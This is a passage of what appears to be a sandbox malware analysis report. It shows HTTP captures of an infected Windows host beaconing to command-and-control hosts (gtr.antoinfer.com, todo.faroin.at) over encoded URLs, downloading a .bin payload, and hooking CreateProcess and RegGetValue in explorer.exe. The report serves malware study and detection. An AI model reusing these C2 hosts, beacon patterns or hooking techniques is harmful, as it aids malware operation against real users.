                              Jul 5, 2021 16:52:50.790273905 CEST1847INData Raw: 98 bf fc 40 4e d9 6d 0c 5b aa 3d cd 83 c7 dd 80 e2 fd d6 32 b8 cd d2 43 54 26 3b cf dc 00 ca 43 9c 11 ad 40 72 bb ba c5 ea dc fb 74 14 91 31 64 cb 36 ed b8 09 fb 4f 9b b7 26 26 9e 2f 0a 7f e5 1e c9 30 b8 c5 65 4a 7e 69 d5 8e b1 82 be 03 8e fa e1
                              Data Ascii: @Nm[=2CT&;C@rt1d6O&&/0eJ~iCR(~O)U{ZkS7>7;;nq'37.Ly?~A[CRah<b|L0JxNEOO,7nbARiRD
                              Jul 5, 2021 16:52:50.977482080 CEST1848INData Raw: d0 39 c5 92 23 49 7a ae 4d 06 df 88 0b e2 3c 7b 50 fb 04 f8 88 98 9d 5e 97 29 24 7e 9a b1 8b 02 d0 8a b7 35 1a 0b d3 0c d5 fc 96 41 a0 37 ba 35 82 1a ad b8 cd 1a 23 0c d0 b0 b8 61 95 37 1b fc 29 9e 99 f9 cc af f9 0c bb 76 4e bc 26 16 63 24 23 34
                              Data Ascii: 9#IzM<{P^)$~5A75#a7)vN&c$#4]WXD\3X:>S PEC1#'eXS]6'ob, (Ecu0U`(2]d^]qt(GL`$ll7R%-$9TiQfDc~1{]]d|4rnF


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.549719165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:52:53.683702946 CEST2097OUTGET /favicon.ico HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:54.221350908 CEST2098INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Content-Encoding: gzip
                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              4192.168.2.549722165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:52:56.212973118 CEST2099OUTGET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:57.141469002 CEST2100INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip
                              Data Raw: 37 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 b2 84 50 14 43 17 d4 03 78 0d 34 30 c4 dd 9d 19 ee ee ac fe ff 05 a4 92 ba 75 73 e2 a8 0d 14 9a 45 0d 8e 9f 70 7a 38 ed b8 b1 06 00 e4 b8 06 b5 5b 85 ea 9e 74 66 0d f4 36 0e 9b 43 34 49 3b 37 ab 4d cd be f9 85 51 4e e3 5d 78 b3 ae 2f a8 19 ef b0 48 56 f7 2e 41 4d 53 40 a0 bb ed e8 7e 93 93 57 ba 32 90 d5 e9 82 48 54 53 a7 bb ae cf 2a 5c 0c bf e2 d0 6c ee 63 10 b2 4d d8 c4 75 39 7d f5 a8 04 16 b9 5d 67 c0 96 5a 09 94 b4 72 e2 26 37 fc a4 a2 c9 54 84 e2 7a 2e 36 e1 9d 9b 1b 59 e9 11 64 a5 ba 75 73 08 7a 4b 0c 4d 58 9d 2b 90 06 98 ca 55 05 b5 db 96 bf 7d 47 e2 29 51 10 49 0b bc f0 3c 60 cd ef 62 79 4b d6 d1 11 9a c6 a9 f8 a0 13 2a ff 08 3d 26 cd a2 09 d6 5a 6a 1a 18 55 6a d7 7f 48 5b a2 18 fd 4d e9 bc 97 19 ad a2 f8 51 53 76 0b c2 9c ea ce 7b 62 94 ad b8 0c dc 96 ca 07 98 52 e5 eb a7 ff 3b 8c b3 61 7d 1f c9 c5 21 db 62 d4 24 9f 2c 47 0c 7b 5e 91 c8 03 f0 8c ab d8 98 af e8 79 eb b6 fa 6a e3 42 a1 59 f1 d9 de 1d ac d6 4b fc 3a e5 01 f5 c1 d3 e2 bd c9 d3 b6 d8 32 6b 2a c7 63 f5 79 4c ac 2e c7 fa 76 b1 9b f7 05 59 0d 10 51 f0 b7 c4 fb ac 13 a2 94 06 82 a9 c4 e1 29 5b 20 50 ea a4 f8 1f 85 72 a8 b8 6d f7 12 6a 49 93 07 51 5b 4d 15 9d fb 0e 7c 7c 4b 2c d5 da 28 c5 3b ea b7 05 77 9a 6b 39 a2 fd 7e 4a 0f 63 e4 da b6 a9 a2 7d 2f 30 d4 66 d5 bb 92 98 b2 61 bc 7e e1 68 c8 b3 39 71 e8 f2 c9 d9 2d cc fa 04 cd bd c0 7f 9a cd e4 bd 8e 5d f6 79 7d a9 e3 e9 ba 06 2e a0 e7 4e 21 21 7d a0 57 47 fb 3a 91 c3 a8 36 8a 15 d6 bd d5 f8 3f 4c 60 3c 13 cc 55 bb 31 0f f3 20 5b 0d 7e 3a bb 34 1e 39 2f 36 ef 0e 7a f9 81 65 1d 7d b0 44 24 47 08 d0 ff 11 b6 09 a6 ef 82 d1 c3 48 d1 48 dc 88 b9 85 b3 6a b3 d7 fd 0f 7e ed 1b be 08 29 8c 26 14 26 f0 27 88 82 f8 37 32 db 47 e0 bc 15 cf 31 e9 d7 ec e6 16 15 7e 38 e7 37 d9 48 00 cd 92 56 da 53 a8 41 c1 e4 60 f1 e1 ab a4 a4 b4 d7 14 a8 ae 1a 9c f8 bd 08 b8 d9 be 88 63 76 d5 f9 50 5e b5 6c 5e 55 51 a8 ce 14 f2 c7 b3 5e 13 37 f9 c7 5f b1 50 f2 ce da dd bf b4 b3 c6 f8 9b a2 12 2b 29 ea 5b db fa ec a7 5b a0 b9 9e d6 04 9f e5 a2 28 b1 09 fb 51 e3 69 c6 a9 64 05 6a 88 a0 db 8e 57 65 15 be 78 95 d6 fa a6 e8 e8 18 30 7d ca 4e 44 99 22 ea 72 ca 1e c4 27 9b ee 63 22 4d b4 28 52 eb 9e dc 90 d6 26 8e cc 6e cd ab ae ad ba 6e 81 6f be 8d d8 23 6c 1a 22 b0 90 1b bc 17 d2 b9 f8 f4 0c e8 8f 2f b9 f9 4d 82 74 ac 75 53 79 14 23 91 98 0c d7 85 de 3f 9d 8e 65 20 3c 9f e4 52 7d 78 d0 b9 da 9e 1a a4 4c 26 ac 86 a3 0b 9e 1c 7d 49 05 c5 e1 5d 6a 63 26 81 5e 85 6f 28 43 0f 99 db 3e b5 0c c4 ff 0f 32 7c 26 fb 07 ac 42 7c 72 c5 b1 1e 95 13 8e 64 07 ec da 82 c3 16 27 e1 53 27 9c 5a b8 0b 49 53 cb 87 42 cc cc d3 9e e8 23 0b cd b8 87 55 a7 87 4e fb ef 3c fb 5f 78 4d 09 82 1c 84 48 4c ac 33 3b ad e7 ff 96 51 97 0f a3 da cb fc ca 32 b5 4c 39 dd b8 86 19 04 93 af 04 18 2a ce d9 f7 b2 34 fd 08 0f 4c cc e6 ce a6 3e af 45 38 f6 d2 7d 59 20 9d 0e 71 ef 68 da 3c ee 58 64 e4 b8 df f9 90 de 42 e0 53 4f 87 73 ae a3 d8 31 ab f5 76 90 5a 5c a0 87 54 bc 88 cc 95 59 6d 72 76 6e 06 6c b2 45 f3 9f ea 2c a8 48 5c 36 b3 8f 3b f4 41 b4 39 c6 a7 5d 91 77 6b 5f 7f 30 a9 9b d4 f0 51 12 87 9d 09 69 27 1f e4 6d 56 04 4d 68 24 71 c5 b5 93 36 a9 14
                              Data Ascii: 767EPCx40usEpz8[tf6C4I;7MQN]x/HV.AMS@~W2HTS*\lcMu9}]gZr&7Tz.6YduszKMX+U}G)QI<`byK*=&ZjUjH[MQSv{bR;a}!b$,G{^yjBYK:2k*cyL.vYQ)[ PrmjIQ[M||K,(;wk9~Jc}/0fa~h9q-]y}.N!!}WG:6?L`<U1 [~:49/6ze}D$GHHj~)&&'72G1~87HVSA`cvP^l^UQ^7_P+)[[(QidjWex0}ND"r'c"M(R&nno#l"/MtuSy#?e <R}xL&}I]jc&^o(C>2|&B|rd'S'ZISB#UN<_xMHL3;Q2L9*4L>E8}Y qh<XdBSOs1vZ\TYmrvnlE,H\6;A9]wk_0Qi'mVMh$q6
                              Jul 5, 2021 16:52:57.141499996 CEST2101INData Raw: f2 6b cf 90 24 22 db 80 7c f0 38 f7 84 b2 a7 28 3e e2 4e 55 3d 3a de 0c f1 eb 8d 07 87 d3 ac db 67 b0 de ff af ef 9e 98 6e 00 e8 0b 01 5e 49 d7 06 07 17 9e ab 76 1f 52 35 79 cc 83 bf 75 35 8b 52 4d bb cf 55 1a 9c f2 e0 5d 93 bd b8 bb 4b f5 3e 2f
                              Data Ascii: k$"|8(>NU=:gn^IvR5yu5RMU]K>/BufN~^GL#},pPJ"EC!p]M=k7l2Ku[}eR|]|W\9(Y6x\%>kY'e<u/$+1:p8qn


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              5192.168.2.549730165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:53:33.216042042 CEST5925OUTGET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:34.131033897 CEST5934INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              6192.168.2.549732165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:53:34.400011063 CEST5937OUTPOST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Content-Length: 2
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:34.400017977 CEST5937OUTData Raw: 0d 0a
                              Data Ascii:
                              Jul 5, 2021 16:53:35.373759031 CEST5945INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 62 30 0d 0a 32 10 c8 db fd 6f e6 fa ac fb 8a 44 ea 7b 9e 48 0f 7b 08 f3 8e 66 cb bb 3d 50 98 b5 81 21 39 5c af 6e ac e9 3b 9d 5d a0 d3 a4 78 8c 74 21 f9 41 23 13 24 5e d8 5b d1 11 d0 f2 57 11 54 2f d2 77 3c 38 92 22 00 7a f6 b8 23 86 6f c9 b4 d1 1d 63 bf 2f 31 df 7c 7f 37 d4 10 60 93 57 02 4e 3e cb 44 49 a6 93 7e 28 6b e1 34 88 19 89 96 ce da ce f2 4c 36 89 ac a1 df f1 ce f9 f0 a3 4d d8 98 5c 5a 49 dc 3f 82 cb 8a 36 1a b2 a9 9e 59 35 74 61 54 0c e9 93 df b5 12 5b 6c 6a df 23 dc 51 69 9f 43 e9 62 d4 3b 1d 8b 68 54 e8 ca 5d 11 17 a4 97 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: b02oD{H{f=P!9\n;]xt!A#$^[WT/w<8"z#oc/1|7`WN>DI~(k4L6M\ZI?6Y5taT[lj#QiCb;hT]0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              7192.168.2.549734165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:53:35.638648987 CEST5946OUTGET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:36.563668966 CEST5947INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:36 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 138896
                              Connection: close
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: attachment; filename="60e31cf05e29a.bin"
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 58 6c e8 f8 d3 3a fd f1 cf 83 dc ae 5c d7 82 36 75 d8 36 de b6 b4 54 08 91 b7 19 a8 6f 8c 27 68 08 53 e8 6f b2 2f e1 38 bf 67 ea 6e 0b 72 ee dc 13 d7 71 47 fe f3 85 f0 1e 55 6f a7 3b 58 fc 2c b4 5b 1a 14 6f 17 1c 7c 76 12 bc 3e 92 ef 6e 3b 6c 12 69 ec 93 f6 06 6a 2c 84 fc 79 d5 5d 7e 50 6a 82 c5 18 cb d7 38 7a a6 1c 41 7c dd 16 80 0e 4c 75 a9 40 35 4c 0b c1 48 16 ea 70 84 73 be 12 79 0e 55 fd 58 87 72 e4 8e 86 eb c6 1f dc 65 47 5e 14 dd 6f 09 83 23 63 e8 db f9 2e b9 65 07 c9 49 1d 0c 2f 6e b5 d2 f7 ea 92 e2 21 0b 11 65 3d d9 76 10 23 f3 e4 fc 2e 14 44 04 07 80 3e 25 cf 6c 57 82 2c e2 dd 81 ee 0f 87 b3 81 24 af 68 ec 7d e3 75 5e 06 6b ef 5d 3d 15 1f b4 7a b7 ce df 12 48 c0 0b c5 aa 2a 78 f6 dc da c9 97 f8 31 5f 68 0b 08 60 cb 5c a3 5f a1 33 d4 20 f5 bb 32 a3 2c ec 4f 29 dc 4a 83 79 d4 39 6d 9c 29 b1 e5 0c 3e 58 b3 23 87 da 62 a7 a0 e8 3a 18 48 9a 8b 5e c7 45 15 55 c7 20 bf 6b 8e a4 a7 9a fd 7e 61 ca 1c 82 ac 34 2a 20 de fc 20 fe ef 89 1a c8 c8 33 e1 32 d5 5a 0b 33 84 97 e4 83 1e 4e 32 c4 54 fe 00 40 45 9e da 8b 25 b6 03 69 b0 dc 6d 83 da 84 f9 73 e5 70 9f 82 58 8b c1 02 bf 2b ea 60 46 4d b3 39 80 2a eb df 53 ad 2d 4d 95 ee 61 fa 74 8b 33 59 0c 4a 21 fc 34 4e 86 d4 22 5c 5c 23 3a a6 cd 2b 13 4d a8 4b a7 00 9a b3 c9 01 de 61 6f c9 27 3e 9a d5 a0 ca 27 84 1c 62 87 5f 24 f6 d4 f5 67 47 52 07 88 16 a8 07 3a 15 51 45 c6 bf c1 63 4e 0a 6e e7 52 c1 0a 47 36 ac af 87 d5 75 48 c6 3c 52 41 48 fe ea cc 58 e1 65 c7 06 0d b1 5f e8 1d 52 4d 9e 2a 78 15 2e 51 6d 6f f1 8d ad 5d a3 a2 ed 53 8c 92 8e 0f f4 36 24 2f 55 01 dd b6 c6 9f 23 30 4a e9 ff 75 2a 99 60 67 f9 40 73 b4 82 8c 6e 37 cc 75 b2 6a bd 48 70 25 78 56 69 73 06 85 d6 10 a7 0d 54 24 e5 07 51 c9 86 3c 8d d6 9d 74 8c d2 a6 da 7a 4f 8b 0e 18 8b cd 2b d0 2d 94 62 f8 02 ce b0 fd 94 a6 9a 6d 97 8a 29 f8 84 0d ce be 27 66 be e2 48 ef 71 07 51 ff 7b 74 c9 36 8d eb 79 ba 67 49 61 0b 08 11 c4 e1 15 9d c3 9b d6 21 20 11 11 b8 6a 90 7c b7 81 25 8d d6 7d 25 7b 82 99 a9 12 ad b8 dd 33 be 08 e7 e5 66 71 1b 28 c6 21 6f 38 b2 25 1f cf 1b 87 45 fa 1e f1 8c e4 62 b0 8e 27 83 af 90 54 5e 7c 40 1a 13 7e 0f 02 5a 40 b0 e2 3b 60 23 17 fd b6 ce 33 ce 81 91 59 a0 64 7e f6 10 f2 aa 5b 97 5a a4 09 ea 03 75 08 1c 72 69 ee 62 81 21 7a c4 fd ff e0 a6 b7 4d 3c 7a 74 6b c2 45 4e b4 85 a7 88 cf f6 e0 8e 77 84 5b ed ac 6b 70 8b 1c 69 0a 88 ce e5 45 91 19 b3 d2 03 59 87 87 a0 ba 93 4a 2f fc 04 59 36 df 61 e5 18 9a 2e 2d 34 97 82 a3 41 63 08 d3 3b 5c 93 bd fe b5 11 87 6c e2 67 84 7c df 69 ac 99 c2 b0 bb 06 ea e2 1e 89 93 8b 90 3f 5f 02 a5 0d 78 c6 f8 b6 e7 68 d7 93 41 03 27 b1 89 68 c5 c5 de 10 6f 0e 94 a2 ff 0d c5 92 bb 7d ea 1e 26 9a 77 91 20 68 1a ac 4a 49 62 6f 0b 3b 56 7d fe 8d 94 3c 0f 38 d7 89 25 f8 cf 14 e9 64 37 27 d8 5a 8b ba cd 87 b3 ed f0 dd 79 50 88 51 2a 01 f3 6d 97 8b 99 db
                              Data Ascii: Xl:\6u6To'hSo/8gnrqGUo;X,[o|v>n;lij,y]~Pj8zA|Lu@5LHpsyUXreG^o#c.eI/n!e=v#.D>%lW,$h}u^k]=zH*x1_h`\_3 2,O)Jy9m)>X#b:H^EU k~a4* 32Z3N2T@E%imspX+`FM9*S-Mat3YJ!4N"\\#:+MKao'>'b_$gGR:QEcNnRG6uH<RAHXe_RM*x.Qmo]S6$/U#0Ju*`g@sn7ujHp%xVisT$Q<tzO+-bm)'fHqQ{t6ygIa! j|%}%{3fq(!o8%Eb'T^|@~Z@;`#3Yd~[Zurib!zM<ztkENw[kpiEYJ/Y6a.-4Ac;\lg|i?_xhA'ho}&w hJIbo;V}<8%d7'ZyPQ*m
                              Jul 5, 2021 16:53:36.563708067 CEST5949INData Raw: b0 ec a6 3c 3b 0d d1 0f b3 2d 5f 12 ef 28 46 d3 51 97 14 10 d1 bc 03 47 96 49 3e 13 6f 6b 65 c9 a4 30 1f 56 f0 f1 1e 4d d7 17 6c 5b df d5 bb 6e cb a3 05 17 7d d6 22 b1 88 be 77 a8 3d b4 b2 5f 52 48 d3 37 ec 9c a1 c2 f8 18 18 7e b2 e8 6f c9 69 d5
                              Data Ascii: <;-_(FQGI>oke0VMl[n}"w=_RH7~oi0L(,zSKkM$e(_(+S&g;B,c(fYlS4_sr*z>~Y#,AWkoaQ%Cm+I>$/LKZCC'f+l
                              Jul 5, 2021 16:53:36.563730001 CEST5950INData Raw: dd 82 a7 62 af de bd 6a f8 37 77 93 95 51 83 e8 9d 72 0e 31 72 f7 a3 15 f4 1f 7d 0d 1c 59 1d 65 9e 8f e5 61 5b c0 97 c6 56 2b 1f b9 b8 56 fb 03 36 05 24 30 dc 0f be be 81 2a d6 0b 4a 71 17 bc 7a 0b b5 10 fa b8 76 26 7f b9 bc 99 37 e7 f0 1f c5 35
                              Data Ascii: bj7wQr1r}Yea[V+V6$0*Jqzv&75btS6~B"#6?o>/CzCTbBfVkI3qY#;8B6(@ZW"p4*xko&qK89]+]9X#sX*h4tg
                              Jul 5, 2021 16:53:36.563750982 CEST5952INData Raw: 5c 7c 32 7b f8 55 f3 df f8 07 05 13 e1 2d 18 3f 0a 23 84 b3 90 ab f5 c3 a4 de 2b d5 c5 f1 c5 cf f2 5d 85 78 dd 49 b6 c5 38 49 60 12 94 72 77 31 e3 34 5f fa 6b 23 b6 ac 2f a7 a5 c8 f0 31 0e c0 fa 64 f8 40 c7 6e 50 e5 e9 b1 2c fc 19 12 3e 6c c6 7c
                              Data Ascii: \|2{U-?#+]xI8I`rw14_k#/1d@nP,>l|oxb: tsR1g"t?diG[{8oC^dtM p6tVP:9/W4n(zvIf90_zOR}\xQq"R)b(V>B{
                              Jul 5, 2021 16:53:36.563774109 CEST5953INData Raw: 46 b3 8b 78 67 d4 1f 2d 7a e2 56 87 30 df e2 07 1f 62 d1 1e dc 68 af 27 da 39 86 b0 4b 23 b3 d2 75 62 94 f5 d4 8b 7d 73 5f 4a 7d 7b a2 06 7e 36 46 d1 87 f7 6c 47 b4 16 86 cc f1 f0 00 fc 2f 59 04 e7 45 c2 fc b7 f0 41 d2 97 f1 67 80 db f0 f7 87 0e
                              Data Ascii: Fxg-zV0bh'9K#ub}s_J}{~6FlG/YEAg&i,a|99zg![',gBa@Y-~Lj~uy&!E;P?d<3`<[^4,[rZO-Ubp$/q#]YR(
                              Jul 5, 2021 16:53:36.563796043 CEST5954INData Raw: f8 97 1b 6f 86 9d 26 ad 21 19 2e 5f 6b c0 46 a8 f2 0a 07 cd 60 7f 41 b6 3b eb c3 d5 0d e9 9e 7f 60 1d 1f fb 52 04 c3 2b da 12 fc 9b b5 a2 7f 8a 0e 85 3d 98 2e 81 29 d9 00 38 aa 9d 45 61 27 48 ac a0 49 87 db ed d4 61 f7 85 c5 6d 29 aa 35 d5 45 74
                              Data Ascii: o&!._kF`A;`R+=.)8Ea'HIam)5EtbV0@gM7v2VZjU"]]d/;6j*-HazhoT*@3T:oH2}Y`.ln/5>f8gb}nQBR
                              Jul 5, 2021 16:53:36.563818932 CEST5956INData Raw: 0e f5 66 1b 80 18 fb 0a 6c 61 30 80 63 1a 72 f3 b8 2c 40 40 d5 27 38 28 bd 6e 47 cf fe a0 c9 a7 b8 0f 5d e0 c2 dc cf fd 5b b5 ac 2e d2 90 be fe 0f be e6 65 fa f2 d3 e5 cf a2 fa 8d bb f7 e9 54 ae 61 fc 34 37 0d fa 45 99 bb 9a 1b b7 a9 c2 e8 a6 a6
                              Data Ascii: fla0cr,@@'8(nG][.eTa47E(~SCGG!1t-c;Y6p+LjPuoV+w;}hQ#>1)79QB#/_dz|1Su*{CR0L{VsPM`B=*f
                              Jul 5, 2021 16:53:36.563844919 CEST5957INData Raw: 77 8d af 4b 2d 8e e5 50 48 63 5e fe 40 99 26 91 85 01 2c de 33 17 54 ea d5 16 fc 4e 67 21 36 69 0a b1 c1 ee 57 15 ce a3 30 c7 0a 76 a3 52 95 05 e2 69 a4 6e 09 85 66 42 5a ae 26 47 ff e0 b7 ea d5 6e 40 9f 98 0c db 00 70 51 6d c5 7e fb 1f d3 c5 3a
                              Data Ascii: wK-PHc^@&,3TNg!6iW0vRinfBZ&Gn@pQm~:-tzre4G-SBUo|KsY(#KrZ,~,?{u'=IVQ:YQ?].ZzNF"JdM<2"Uf;QJ|~@BaBJ.8q^xO
                              Jul 5, 2021 16:53:36.563867092 CEST5958INData Raw: 2a 07 7c dd 44 a6 f5 63 ef 31 9c 30 68 c0 43 d0 d9 24 50 1b 8a 62 98 c4 62 da 66 1b cd 40 b2 ff 5a 37 06 e9 34 b2 5b e5 86 16 33 41 48 3f a7 8e a8 85 e0 7c 5c ff df 67 08 ea ad 8d 78 cb 11 46 a6 1a 56 a4 ba 9e e1 73 64 d3 e0 86 03 f8 81 c5 58 8e
                              Data Ascii: *|Dc10hC$Pbbf@Z74[3AH?|\gxFVsdXJ<,/DR2i$O:oW.B6tQ?^X!4PQ+.D8j2U@l[gh23[u&~8!Q%:+jZW\v.
                              Jul 5, 2021 16:53:36.566787004 CEST5960INData Raw: 86 7d 6d d0 11 b2 0a b5 52 54 a9 dd ca 08 61 95 b2 2f 7e 7c 52 42 1e f2 ba 55 3e ee b9 f4 59 7f 51 35 c3 1b 60 b4 5c bc 1d 6d c8 39 07 08 4c 03 9b b8 48 fc 22 ca ba 24 92 f7 df 79 6d a1 39 9d a3 37 43 e6 aa 7a 1b b0 17 45 68 20 e9 30 ab 83 80 48
                              Data Ascii: }mRTa/~|RBU>YQ5`\m9LH"$ym97CzEh 0Hv_Sz4R=ESW5 FnF|yAeK>u*W}>={6}BA?1c9w?XCHU7U%)b&2suPADMJHwYPe!tV?P$
                              Jul 5, 2021 16:53:36.761816025 CEST5961INData Raw: d6 3e 47 61 f0 78 f1 a4 bf d4 b3 0f 7e ba 6e 88 1e 24 f9 10 d1 a0 b5 92 bb 22 f3 9d 87 ec 6d 9c a0 4f ce f3 c8 ab d7 69 b7 51 89 1f 91 8a 9a f8 08 31 6d a5 f1 13 5f ea 10 9d 7b 8f 2b a3 96 95 58 79 d9 d4 ee b1 21 17 c0 79 2e 32 8e 17 ac 60 0c 5c
                              Data Ascii: >Gax~n$"mOiQ1m_{+Xy!y.2`\0d OyX02eLU=F;i,p3CgV>,(m< :o'+UyalU 3L5 .EV\H$ru-x7/R&


                              Code Manipulations

                              User Modules

                              Hook Summary

                              Function NameHook TypeActive in Processes
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                              CreateProcessAsUserWEATexplorer.exe
                              CreateProcessAsUserWINLINEexplorer.exe
                              CreateProcessWEATexplorer.exe
                              CreateProcessWINLINEexplorer.exe
                              CreateProcessAEATexplorer.exe
                              CreateProcessAINLINEexplorer.exe

                              Processes

                              Process: explorer.exe, Module: WININET.dll
                              Function NameHook TypeNew Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT3B9EF98
                              Process: explorer.exe, Module: user32.dll
                              Function NameHook TypeNew Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT3B9EF98
                              Process: explorer.exe, Module: KERNEL32.DLL
                              Function NameHook TypeNew Data
